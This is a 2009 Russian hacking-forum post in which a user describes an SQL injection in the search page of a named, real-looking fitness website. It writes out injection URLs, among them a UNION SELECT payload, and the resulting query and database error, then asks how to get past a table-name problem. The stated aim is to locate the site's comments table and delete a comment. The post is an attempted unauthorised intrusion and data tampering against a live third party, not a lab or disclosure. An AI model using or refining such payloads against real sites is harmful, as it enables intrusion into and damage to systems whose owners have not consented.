06.02.2009, 20:20
|
|
Новичок
Регистрация: 06.02.2009
Сообщений: 2
С нами:
9083950
Репутация:
0
|
|
Загадочный SQL inj
Вот такой SQL inj
http://www.moscowfitness.ru/find.php?cname=bebebe'
Долго не мог подобрать не одной таблицы, а потом попробовал вот так
http://www.moscowfitness.ru/find.php?cname=bebebe' UNION select 1 FROM CLUBS/*
и удивился.
Вышло следующее
Код:
select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID
MYSQL заявил, что "Table 'db10002m.clubs' doesn't exist"
Как такое может быть? Для первой части запроса таблица CLUBS есть, а для второй уже нет.
Или это так приведение к нижнему регистру влияет?
p.s. Глобальная задача найти таблицу с комментариями и удалить один из комментариев. |
|
|